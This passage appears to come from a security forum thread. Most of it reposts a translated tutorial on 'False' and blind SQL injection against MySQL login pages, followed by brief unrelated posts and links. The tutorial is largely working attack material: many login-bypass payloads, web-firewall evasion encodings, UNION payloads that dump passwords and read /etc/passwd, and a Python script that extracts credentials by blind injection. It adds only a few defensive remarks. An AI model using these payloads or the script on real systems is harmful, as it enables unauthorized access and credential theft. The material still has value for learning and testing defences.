statement used "select id, password from table where id='' and password='', you can easily understand when you think 0 about character single quotation mark. Empty space is same as 0, the attack is possible using = and 0. As a result, following statement enables log on process. '=0# We can apply it in a different way. 
This is possible as 0>-1 '>-1# Also, this is possible as 0<1 '<1# You don't have to use only single figures. You can use two figures attack as follow. 1'<99# Comparison operation 0=1 will be 0, the following operation result is true because of id=''=0(0=1). '=0=1# Additionally there is some possible comparison operation making the same value each other. '<=>0# Like this, if you use the comparison operation, you can attack as additional manner. '=0=1=1=1=1=1# '=1<>1# '<>1# 1'<>99999# '!=2!=3!=4# In this time, you get the turn on understanding False SQL injection. the following is not attack but operation for MySQL. mysql> select * from users; +-----+-----------+----------+ | num | id | password | +-----+-----------+----------+ | 1 | admin | ad1234 | | 2 | wh1ant | wh1234 | | 3 | secuholic | se1234 | +-----+-----------+----------+ 3 rows in set (0.01 sec) This shows the contents in any table without any problem. The following is the content when you don't input any value in the id mysql> select * from users where id=''; Empty set (0.00 sec) Of course there is no result, because no row has an empty string in the id field. In MySQL, however, when a string column is compared with a number, each string is converted to a number first, and a string that does not start with digits converts to 0; so comparing the id column with 0 is true for every row here. Based on that, the following statement is true. mysql> select * from users where id=0; +-----+-----------+----------+ | num | id | password | +-----+-----------+----------+ | 1 | admin | ad1234 | | 2 | wh1ant | wh1234 | | 3 | secuholic | se1234 | +-----+-----------+----------+ 3 rows in set (0.00 sec) If you input 0 in id, All the content is showed. This is the basic about "False SQL Injection". After all, result of 0 makes log on process success. For making the result 0, you need something processing integer, in that time you can use bitwise operations and arithmetic operations. Once I'll show bitwise operation example. Or bitwise operation is well known for any programmer. And as I told you before, '' is 0, if you operate "0 bitwise OR 0", the result is 0. 
So the following operation succeed log on as the False SQL Injection. '|0# Naturally, you can use AND operation. '&0# This is the attack using XOR '^0# Also using shift operation is enable. '<<0# '>>0# If you apply like those bitwise operations, you can use variable attack methods. '&''# '%11&1# '&1&1# '|0&1# '<<0|0# '<<0>>0# In this time, I will show "False SQL Injection" using arithmetic operations. If the result is 0 using arithmetic operation with '', attack will be success. The following is the example using arithmetic operation. '*9# Multiplication '/9# Division. '%9# Mod '+0# Addition '-0# Subtraction Significant point is that the result has to be under one. Also you can attack as follow. '+2+5-7# '+0+0-0# '-0-0-0-0-0# '*9*8*7*6*5# '/2/3/4# '%12%34%56%78# '/**/+/**/0# '-----0# '+++0+++++0*0# Next attack is it using function. In this document, I can't show all the functions. Because this attack is not difficult, you can use the "True, False SQL Injection" attack with function as much as you want. And whether this attack is "True SQL Injection" or "False SQL Injection" is decided on the last operation after return of function. '<hex(1)# '=left(0x30,1)# '=right(0,1)# '!=curdate()# '-reverse(0)# '=ltrim(0)# '<abs(1)# '*round(1,1)# '&left(0,0)# '*round(0,1)*round(0,1)# Also, you can use attack using space in function name. But you are able to use the space with only some function. '=upper (0)# In this time, SQL keyword is method. This method is also decided as True or False Injection according to case. ' <1 and 1# 'xor 1# 'div 1# 'is not null# admin' order by' admin' group by' 'like 0# 'between 1 and 1# 'regexp 1# Inputting id or password in the field without a comment is possible about True, False SQL Injection. Normal Web Firewalls filter #, --, /**/, so the method is more effective in the Web Firewalls. This is also why keyword and comment filtering cannot be the primary defence: every input above works only because the value is concatenated into the SQL text, and binding id and password as parameters of a prepared statement keeps them from being parsed as SQL at all. 
ID : '=' PASS: '=' ID : '<>'1 PASS: '<>'1 ID : '>1=' PASS: '>1=' ID : 0'='0 PASS: 0'='0 ID : '<1 and 1>' PASS: '<1 and 1>' ID : '<>ifnull(1,2)='1 PASS: '<>ifnull(1,2)='1 ID : '=round(0,1)='1 PASS: '=round(0,1)='1 ID : '*0*' PASS: '*0*' ID : '+' PASS: '+' ID : '-' PASS: '-' ID :'+1-1-' PASS:'+1-1-' All attacks used in the documentation will be more effective with using bracket when detouring web firewall. '+(0-0)# '=0<>((reverse(1))-(reverse(1)))# '<(8*7)*(6*5)*(4*3)# '&(1+1)-2# '>(0-100)# Let's see normal SQL Injection attack. ' or 1=1# If this is translated in hexdemical, the result is as follow. http://127.0.0.1/login.php?id=%27%20%6f%72%20%31%3d%31%23&password=1234 Like attack above is basically filtered. So that's not good attack, I will try detour filtering using tab(%09) standing in for space(%20). In truth, you can use %a0 on behalf of %09. The possible values are as follow. %09 %0a %0b %0c %0d %a0 %23%0a %23%48%65%6c%6c%6f%20%77%6f%6c%72%64%0a The following is the example using %a0 instead of %20. http://127.0.0.1/login.php?id=%27%a0%6f%72%a0%31%3d%31%23&password=1234 In this time, I will show "Blind SQL injection" attack, this attack can't detour web firewall filtering, but some attacker tend to think that Blind SQL Injection attack is impossible to log on page. So I decided showing this subject. The following attack code can be used on log on page. And the page will show id and password. 'union select 1,group_concat(password),3 from users# This attack code brings /etc/password information. 'union select 1,load_file(0x2f6574632f706173737764),3 from users# Dare I say it without union select statement using Blind SQL injection with and operation is possible. The result of record are three. admin' and (select count(*) from users)=3# Let's attack detouring web firewall using Blind SQL Injection. The following is vulnerable code to Blind SQL Injection. 
<?php /*** info.php ***/ $n = $_GET['num']; if(empty($n)){ $n = 1; } $dbhost = 'localhost'; $dbuser = 'root'; $dbpass = 'root'; $database = 'injection_db'; $db = mysql_connect($host, $dbuser, $dbpass); mysql_select_db($database,$db); $sql = mysql_query("select * from `users` where num=".$n) or die (mysql_error()); $info = @mysql_fetch_row($sql); echo "<body bgcolor=#000000>"; echo "<h1><font color=#FFFFFF>wh1ant</font>"; echo "<font color=#2BF70E> site for blind SQL injection test</h1><br>"; echo "<h1><font color=#2BF70E>num: </font><font color=#D2691E>".$info[0]."</font></h1>"; echo "<h1><font color=#2BF70E>user: </font><font color=#D2691E>".$info[1]."</font>"; echo "<body>"; mysql_close($db); ?> Basic Blind SQL Injection is as follow on like above. http://127.0.0.1/info.php?num=1 and 1=0 http://127.0.0.1/info.php?num=1 and 1=1 But using = operation is possible for Blind SQL Injection. http://192.168.137.129/info.php?num=1=0 http://192.168.137.129/info.php?num=1=1 Also other operation is possible naturally. 
http://127.0.0.1/info.php?num=1<>0 http://127.0.0.1/info.php?num=1<>1 http://127.0.0.1/info.php?num=1<0 http://127.0.0.1/info.php?num=1<1 http://127.0.0.1/info.php?num=1*0*0*1 http://127.0.0.1/info.php?num=1*0*0*0 http://127.0.0.1/info.php?num=1%1%1%0 http://127.0.0.1/info.php?num=1%1%1%1 http://127.0.0.1/info.php?num=1 div 0 http://127.0.0.1/info.php?num=1 div 1 http://127.0.0.1/info.php?num=1 regexp 0 http://127.0.0.1/info.php?num=1 regexp 1 http://127.0.0.1/info.php?num=1^0 http://127.0.0.1/info.php?num=1^1 Attack example: http://127.0.0.1/info.php?num=0^(locate(0x61,(select id from users where num=1),1)=1) http://127.0.0.1/info.php?num=0^(select position(0x61 in (select id from users where num=1))=1) http://127.0.0.1/info.php?num=0^(reverse(reverse((select id from users where num=1)))=0x61646d696e) http://127.0.0.1/info.php?num=0^(lcase((select id from users where num=1))=0x61646d696e) http://127.0.0.1/info.php?num=0^(id regexp 0x61646d696e) http://127.0.0.1/info.php?num=0^(id=0x61646d696e) http://127.0.0.1/info.php?num=0^((select octet_length(id) from users where num=1)=5) http://127.0.0.1/info.php?num=0^((select character_length(id) from users where num=1)=5) Every one of these requests carries something other than digits in num, so a server-side check that num is a plain integer rejects all of them. Showing every attack would take too much time, so I will stop here. Blind SQL Injection is difficult to do manually, so using a tool is more effective. I will show a tool written in Python; this example uses the ^ (XOR) bitwise operation. In order to make the most of detouring the web firewall, I replaced space with %0a. 
#!/usr/bin/python ### blind.py ### import urllib import sys import os def put_data(true_url, true_result, field, index, length): for i in range(1, length+1): for j in range(32, 127): attack_url = true_url + "^(%%a0locate%%a0%%a0(0x%x,(%%a0select%%a0%s%%a0%%a0from%%a0%%a0users%%a0where%%a0num=%d),%d)=%d)" % (j,field,index,i,i) attack_open = urllib.urlopen(attack_url) attack_result = attack_open.read() attack_open.close() if attack_result==true_result: ch = "%c" % j sys.stdout.write(ch) break print "\t\t", def get_length(false_url, false_result, field, index): i=0 while 1: data_length_url = false_url + "^(%%a0(select%%a0octet_length%%a0%%a0(%s)%%a0from%%a0users%%a0where%%a0num%%a0=%%a0%d)%%a0=%%a0%d)" % (field,index,i) data_length_open = urllib.urlopen(data_length_url) data_length_result = data_length_open.read() data_length_open.close() if data_length_result==false_result: return i i+=1 url = "http://127.0.0.1/info.php" true_url = url + "?num=1" true_open = urllib.urlopen(true_url) true_result = true_open.read() true_open.close() false_url = url + "?num=0" false_open = urllib.urlopen(false_url) false_result = false_open.read() false_open.close() print "num\t\tid\t\tpassword" fields = "num", "id", "password" for i in range(1, 4): for j in range(0, 3): length = get_length(false_url, false_result, fields[j], i) length = put_data(false_url, true_result, fields[j], i, length) print "" To its regret, the attack test is stopped for no time, if anyone not this writer studies some attack codes additionally, it will be easy for him to develop the attack. # Korean document: http://wh1ant.kr/archives/[Hangul]%20False%20SQL%20injection%20and%20Advanced%20blind%20SQL%20injection.txt [EOF] Sursa: Vulnerability analysis, Security Papers, Exploit Tutorials
  20. Sfinte cacat, nu va bateti joc de aceasta categorie.
  21. Ce pula mea "tutoriale" sunt astea? Nu mai postati toate rahaturile.
  22. 30 Best Sources For Linux / *BSD / Unix Documentation On the Web. By Vivek Gite on December 21, 2011. Man pages are written by sysadmins and developers for IT techs, and are intended more as a reference than as a how-to. Man pages are very useful for people who are already familiar with Linux, Unix, and BSD operating systems. Use man pages when you just need to know the syntax of a particular command or configuration file; they are not helpful for new Linux users and are not good for learning something for the first time. Here are the thirty best documentation sites on the web. Link: http://www.cyberciti.biz/tips/linux-unix-bsd-documentations.html
  23. Cati au primit avertisment sau ban pentru ca au postat acolo si nu aveau 10 posturi? Poate 2-3 care au venit cu intrebari si cereri idioate. Nu s-au dat decat probabil cateva avertismente pentru asa ceva, in functie de postul cu pricina. Nu tinem mult la acea regula, insa pana la urma e utila. De ce sa fie toti leecheri sa nu contribuie cu nimic? In primul rand se poate prezenta, de acolo ne facem o idee despre persoana in cauza si poate toleram chiar si o cerere stupida. Apoi, oricine poate posta o stire din IT sau ceva util.
  24. Probably the Best Free Security List in the World. Updated 21. December 2011 - 4:27 by ako. Contents: 1. Introduction / Keys / What's New 2. Realtime Protection 3. Scanners 4. Virus Removal Tools 5. Online Scanners 6. Firewalls 7. HIPS 8. System Hardening-HIPS 9. System Hardening 10. Sandboxing / Virtualization 11. Vulnerability Scanning 12. Browser Security 13. IP-Blocking/Hardening 14. Privacy 15. System Monitoring 16. Network Traffic Monitoring 17. System Cleaning 18. Data Rescue 19. Encrypting 20. Backup 21. System Rescue 22. Miscellaneous 23. Tests & Analysis Tools 24. Vista/Windows 7 Security 25. My Choices and More Link: http://www.techsupportalert.com/content/probably-best-free-security-list-world.htm
  25. Nytro

    Exploit Hub

    ExploitHub is the first legitimate marketplace for validated, non-zero-day exploits Link: https://www.exploithub.com/